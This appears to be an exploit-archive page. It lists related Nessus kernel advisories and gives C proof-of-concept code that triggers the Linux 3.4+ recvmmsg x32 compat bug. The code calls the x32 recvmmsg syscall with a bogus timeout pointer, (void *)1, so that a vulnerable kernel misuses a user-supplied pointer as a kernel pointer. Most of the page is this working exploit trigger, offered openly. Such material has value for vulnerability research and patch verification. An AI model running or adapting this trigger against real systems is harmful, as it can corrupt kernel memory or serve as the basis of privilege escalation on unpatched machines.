Linux Kernel recvmmsg x32 compat PoC exploit
Reporter | Title | Published | Views | Family All 84 |
---|---|---|---|---|
Tenable Nessus | Slackware 14.1 : kernel (SSA:2014-050-03) | 20 Feb 201400:00 | – | nessus |
Tenable Nessus | Ubuntu 13.10 : linux vulnerability (USN-2096-1) | 31 Jan 201400:00 | – | nessus |
Tenable Nessus | Ubuntu 12.04 LTS : linux-lts-saucy vulnerability (USN-2095-1) | 31 Jan 201400:00 | – | nessus |
Tenable Nessus | Ubuntu 12.04 LTS : linux-lts-raring vulnerability (USN-2094-1) | 31 Jan 201400:00 | – | nessus |
Tenable Nessus | Mandriva Linux Security Advisory : kernel (MDVSA-2014:038) | 18 Feb 201400:00 | – | nessus |
Tenable Nessus | openSUSE Security Update : kernel (openSUSE-SU-2014:0205-1) | 13 Jun 201400:00 | – | nessus |
Tenable Nessus | Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3034) | 20 May 201400:00 | – | nessus |
Tenable Nessus | SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3210-1) (Dirty COW) | 5 Dec 201700:00 | – | nessus |
Tenable Nessus | openSUSE Security Update : kernel (openSUSE-SU-2014:0204-1) | 13 Jun 201400:00 | – | nessus |
Tenable Nessus | SUSE SLES12 Security Update : kernel (SUSE-SU-2017:3249-1) (Dirty COW) | 11 Dec 201700:00 | – | nessus |
/*
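* PoC trigger for the Linux 3.4+ recvmmsg x32 compat bug, based on the example
* program in the recvmmsg(2) manpage
*
* https://code.google.com/p/chromium/issues/detail?id=338594
*
* The program only receives; datagrams for the bound socket (127.0.0.1:1234)
* come from a second shell:
* $ while true; do echo $RANDOM > /dev/udp/127.0.0.1/1234; sleep 0.25; done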
*/
#define _GNU_SOURCE
#include <netinet/ip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/syscall.h>
#define __X32_SYSCALL_BIT 0x40000000
#undef __NR_recvmmsg
#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)
int
main(void)
{
#define VLEN 10
#define BUFSIZE 200
#define TIMEOUT 1
    struct mmsghdr vec[VLEN];          /* one header per datagram slot */
    struct iovec iov[VLEN];            /* one scatter/gather entry per slot */
    char payload[VLEN][BUFSIZE + 1];   /* +1 keeps room for the terminator written below */
    struct sockaddr_in addr;
    struct timespec ts;
    int fd;
    int received;

    /* UDP socket bound to 127.0.0.1:1234, the port the sender loop writes to. */
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    if (fd == -1) {
        perror("socket()");
        return EXIT_FAILURE;
    }

    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = htons(1234);
    if (bind(fd, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
        perror("bind()");
        return EXIT_FAILURE;
    }

    /* Each message header points at exactly one BUFSIZE-byte buffer. */
    memset(vec, 0, sizeof(vec));
    for (int slot = 0; slot < VLEN; slot++) {
        iov[slot].iov_base = payload[slot];
        iov[slot].iov_len = BUFSIZE;
        vec[slot].msg_hdr.msg_iov = &iov[slot];
        vec[slot].msg_hdr.msg_iovlen = 1;
    }

    /* A valid timeout is prepared but only the reference calls below use it. */
    ts.tv_sec = TIMEOUT;
    ts.tv_nsec = 0;

    /*
     * Well-formed equivalents, kept for comparison (both pass a real timespec):
     *   received = recvmmsg(fd, vec, VLEN, 0, &ts);
     *   received = syscall(__NR_recvmmsg, fd, vec, VLEN, 0, &ts);
     *
     * The active call differs in two ways. __NR_recvmmsg was redefined at
     * file scope to __X32_SYSCALL_BIT + 537, so the request enters the
     * kernel through the x32 syscall table rather than the native one, and
     * the timeout argument is the constant (void *)1ul, which is not the
     * address of any timespec. The affected x32 compat entry point handed
     * the user-supplied timeout pointer to the in-kernel implementation as
     * if it were a kernel pointer, without copying the timespec in from
     * user space first.
     *
     * NOTE(review): on a kernel carrying the fix this call is expected to
     * fail with EFAULT, and with ENOSYS where x32 support (CONFIG_X86_X32)
     * is not built in; either way the perror() branch below runs. Confirm
     * against the kernel under test.
     */
    received = syscall(__NR_recvmmsg, fd, vec, VLEN, 0, (void *)1ul);
    if (received == -1) {
        perror("recvmmsg()");
        return EXIT_FAILURE;
    }

    printf("%d messages received\n", received);
    for (int k = 0; k < received; k++) {
        /* msg_len is at most BUFSIZE, so this index stays inside the row. */
        payload[k][vec[k].msg_len] = '\0';
        printf("%d %s", k + 1, payload[k]);
    }

    return EXIT_SUCCESS;
}